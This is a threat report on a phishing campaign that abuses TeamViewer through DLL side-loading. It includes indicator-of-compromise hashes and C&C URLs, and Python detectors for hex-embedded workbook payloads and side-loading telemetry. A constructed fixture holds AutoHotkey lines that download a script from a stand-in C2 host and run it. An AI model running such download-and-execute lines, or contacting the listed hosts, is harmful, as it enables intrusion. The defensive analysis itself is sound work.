TeamViewer is a widely used tool for remote desktop control, desktop sharing, online meetings, web conferencing and file transfer. Based on the full infection chain and the design of the lure document used in this attack, together with the activity that followed, the researchers believe the attack was carried out by a financially motivated Russian-speaking actor. Recent malicious campaigns repeatedly abuse TeamViewer to deliver malware that steals sensitive data and money from various government and financial networks by way of a malicious TeamViewer DLL.

## Weaponized TeamViewer Infection Chain

The initial stage of the infection chain begins with a spam email carrying a malicious XLSM attachment that contains embedded macros, titled "Military Financing Program." Purporting to come from the US Department of State, it is a well-crafted malicious document stamped top secret to persuade the victim to open it. Once the victim opens the macro-laced lure document, the XLSM pulls two files out of hex-encoded cells. The first is a legitimate AutoHotkeyU32.exe program; the second is AutoHotkeyU32.ahk, an AHK script that communicates with the C&C server and downloads and executes additional scripts. Because the interpreter itself is legitimate, the malicious logic lives entirely in the .ahk text file, which is where detection has to look.
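As an added example (not code from the original article or from the researchers who analysed the campaign), the following Python scans an OOXML workbook for the dropper pattern described above: it flags a VBA project and any cell whose text is a long hex string that decodes to an embedded file, and classifies each decoded blob by its content rather than by a file extension. The sample workbook, the PE-like stub and the AutoHotkey lines inside it are constructed here for illustration and are not the real attachment.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

SML_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS = {"m": SML_NS}
# Even-length hex of at least 32 bytes: long enough to rule out ordinary cell values.
HEX_CELL_RE = re.compile(r"^(?:[0-9A-Fa-f]{2}){32,}$")


def build_sample_xlsm() -> bytes:
    """Constructed stand-in for the lure workbook: a VBA project plus two cells holding hex-encoded files."""
    fake_exe = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 60  # constructed PE-like stub, 128 bytes
    fake_ahk = (b"; constructed stand-in for AutoHotkeyU32.ahk\n"
                b"UrlDownloadToFile, http://c2.invalid/gate.php, %A_Temp%\\htv.ahk\n"
                b"Run, AutoHotkeyU32.exe %A_Temp%\\htv.ahk\n")
    cells = "".join(
        f'<c r="{ref}" t="inlineStr"><is><t>{blob.hex()}</t></is></c>'
        for ref, blob in (("A1", fake_exe), ("B1", fake_ahk))
    )
    sheet = (f'<worksheet xmlns="{SML_NS}"><sheetData><row r="1">{cells}</row>'
             '<row r="2"><c r="A2" t="inlineStr"><is><t>Military Financing Program</t></is></c></row>'
             '</sheetData></worksheet>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("xl/worksheets/sheet1.xml", sheet)
        z.writestr("xl/vbaProject.bin", b"placeholder")  # presence alone marks a macro-enabled workbook
    return buf.getvalue()


def classify(blob: bytes) -> str:
    """Guess what a decoded cell payload is from its content."""
    if blob[:2] == b"MZ":
        return "PE executable"
    text = blob.decode("latin-1")
    if re.search(r"(?im)^\s*(UrlDownloadToFile|Run|FileInstall|DllCall|SetTimer)\b", text):
        return "AutoHotkey script"
    return "unknown"


def _shared_strings(z: zipfile.ZipFile) -> list:
    """Load the shared-string table so cells of type 's' can be resolved."""
    if "xl/sharedStrings.xml" not in z.namelist():
        return []
    root = ET.fromstring(z.read("xl/sharedStrings.xml"))
    return ["".join(t.text or "" for t in si.iter(f"{{{SML_NS}}}t"))
            for si in root.iter(f"{{{SML_NS}}}si")]


def _cell_text(c, shared: list) -> str:
    """Return a cell's textual value for inline strings, shared strings and plain values."""
    kind = c.get("t")
    if kind == "inlineStr":
        return "".join(t.text or "" for t in c.iter(f"{{{SML_NS}}}t"))
    v = c.find("m:v", NS)
    if v is None:
        return ""
    return shared[int(v.text)] if kind == "s" else (v.text or "")


def scan_workbook(xlsm: bytes) -> dict:
    """Report a VBA project and every cell whose text decodes from hex to an embedded file."""
    report = {"has_vba_project": False, "embedded": []}
    with zipfile.ZipFile(io.BytesIO(xlsm)) as z:
        names = z.namelist()
        report["has_vba_project"] = any(n.lower().endswith("vbaproject.bin") for n in names)
        shared = _shared_strings(z)
        for name in names:
            if not name.startswith("xl/worksheets/"):
                continue
            root = ET.fromstring(z.read(name))
            for c in root.iter(f"{{{SML_NS}}}c"):
                text = _cell_text(c, shared).strip()
                if HEX_CELL_RE.match(text):
                    blob = bytes.fromhex(text)
                    report["embedded"].append({"sheet": name, "cell": c.get("r"),
                                               "size": len(blob), "kind": classify(blob)})
    return report


if __name__ == "__main__":
    print(scan_workbook(build_sample_xlsm()))
```

The scan deliberately ignores the VBA code itself: the macro is only the glue that writes the cells to disk, so a hex string that decodes to an MZ header or to AutoHotkey commands is the more robust signal, and it survives macro obfuscation.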

There are three malicious AHK scripts, each carrying out a different action. In this case the threat actors use the TeamViewer DLL side-loading technique (htv.ahk), which lets the attacker add functionality to TeamViewer. The side-loaded DLL is used to keep the TeamViewer user interface hidden from the user and to save the current TeamViewer session credentials to a text file, enabling the attackers to transfer and execute additional EXE or DLL files.

## Remote Payload Delivery and Execution

According to Check Point Research, once the malicious TeamViewer DLL grants remote access, one of the first functions of the AutoHotkey scripts is to upload a screenshot of the affected PC. Based on telemetry records, the attack targeted countries such as Nepal, Guyana, Kenya, Italy, Liberia, Bermuda and Lebanon, focusing on the public financial sector and public officials.

## Indicators of Compromise

DLLs

- 013e87b874477fcad54ada4fa0a274a2
- 799AB035023B655506C0D565996579B5
- e1167cb7f3735d4edec5f7219cea64ef
- 6cc0218d2b93a243721b088f177d8e8f
- aad0d93a570e6230f843dcdf20041e1e
- 1e741ebc08af09edc69f017e170b9852
- c6ae889f3bee42cc19a728ba66fa3d99
- 1675cdec4c0ff49993a1fcbdfad85e56
- 72de32fa52cc2fab2b0584c26657820f
- 44038b936667f6ce2333af80086f877f

Documents

- 4acf624ad87609d476180ecc4c96c355
- 4dbe9dbfb53438d9ce410535355cd973

C&Cs

- 1c-ru[.]net/check/license
- intersys32[.]com/3307/
- 146.0.72[.]180/3307/
- 146.0.72[.]180/newcpanel_gate/gate.php
- 185.70.186[.]145/gate.php
- 185.70.186[.]145/index.php
- 193.109.69[.]5/3307/gate.php
- 193.109.69[.]5/9125/gate.php
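As an added example that is not from the original article or from Check Point Research, the Python below applies detection rules for the behaviours described in the two sections above (TeamViewer running from a user-writable directory and loading an unsigned DLL, the AutoHotkey interpreter dropping scripts, TeamViewer writing a text file as the credential-theft step does, and contact with the listed C&C hosts and URL shapes) to a set of event records. The event dicts are constructed here in the style of endpoint telemetry (process-create, image-load, file-create, network-connect and proxy-request records); the paths, the DLL name TV.dll and the file name session.txt are assumptions for illustration, while the hosts come from the IOC list on this page.

```python
import re
from collections import namedtuple

# Hosts from this page's C&C list, with the defanging brackets removed.
C2_HOSTS = {"1c-ru.net", "intersys32.com", "146.0.72.180", "185.70.186.145", "193.109.69.5"}
# Path shapes seen in the listed C&C URLs: /gate.php, /index.php, /check/license, /<four digits>/
C2_PATH_RE = re.compile(r"(/(gate|index)\.php$)|(/check/license$)|(^/\d{4}/?$)")
# Directories a standard user can write to; a TeamViewer binary here is not a normal install.
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|ProgramData|Downloads)\\", re.I)
DROPPED_EXT = (".ahk", ".exe", ".dll")

Alert = namedtuple("Alert", "rule detail")


def proc_name(ev: dict) -> str:
    return ev.get("Image", "").rsplit("\\", 1)[-1].lower()


def detect(events: list) -> list:
    """Apply the side-loading, credential-theft and C&C rules to a list of event dicts."""
    alerts = []
    for ev in events:
        name = proc_name(ev)
        t = ev["Type"]
        if t == "ProcessCreate" and name == "teamviewer.exe" and USER_WRITABLE_RE.search(ev["Image"]):
            alerts.append(Alert("teamviewer_in_user_writable_dir", ev["Image"]))
        elif t == "ImageLoad" and name == "teamviewer.exe":
            # Side-loading: the legitimate process maps a DLL that carries no valid signature.
            if ev.get("Signed") != "true" or ev.get("SignatureStatus") != "Valid":
                alerts.append(Alert("teamviewer_loads_unsigned_dll", ev["ImageLoaded"]))
        elif t == "FileCreate":
            target = ev["TargetFilename"]
            if name.startswith("autohotkey") and target.lower().endswith(DROPPED_EXT):
                alerts.append(Alert("autohotkey_drops_payload", target))
            elif name == "teamviewer.exe" and target.lower().endswith(".txt"):
                # Session credentials written to a text file next to the binary.
                alerts.append(Alert("teamviewer_writes_text_file", target))
        elif t == "NetworkConnect" and ev["DestinationIp"] in C2_HOSTS:
            alerts.append(Alert("c2_ip_contact", f'{name} -> {ev["DestinationIp"]}:{ev["DestinationPort"]}'))
        elif t == "ProxyRequest":
            if ev["Host"] in C2_HOSTS or C2_PATH_RE.search(ev["Path"]):
                alerts.append(Alert("c2_url_contact", ev["Host"] + ev["Path"]))
    return alerts


# Constructed sample telemetry (not real captured events).
TV = r"C:\Users\alice\AppData\Roaming\TV\TeamViewer.exe"
AHK = r"C:\Users\alice\AppData\Local\Temp\AutoHotkeyU32.exe"
SAMPLE_EVENTS = [
    {"Type": "ProcessCreate", "Image": TV},
    {"Type": "ImageLoad", "Image": TV, "ImageLoaded": r"C:\Users\alice\AppData\Roaming\TV\TV.dll",
     "Signed": "false", "SignatureStatus": "Unavailable"},
    {"Type": "ImageLoad", "Image": TV, "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"Type": "FileCreate", "Image": AHK, "TargetFilename": r"C:\Users\alice\AppData\Local\Temp\htv.ahk"},
    {"Type": "FileCreate", "Image": TV, "TargetFilename": r"C:\Users\alice\AppData\Roaming\TV\session.txt"},
    {"Type": "NetworkConnect", "Image": TV, "DestinationIp": "185.70.186.145", "DestinationPort": 80},
    {"Type": "ProxyRequest", "Image": AHK, "Host": "intersys32.com", "Path": "/3307/"},
    {"Type": "NetworkConnect", "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationIp": "93.184.216.34", "DestinationPort": 443},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a.rule}: {a.detail}")
```

The IOC hosts will age quickly; the behavioural rules (an unsigned DLL in TeamViewer's address space, the binary living under AppData, and a text file written by the TeamViewer process) are the ones worth keeping, and in a real deployment the signature fields should come from the endpoint agent rather than be trusted from the event as-is.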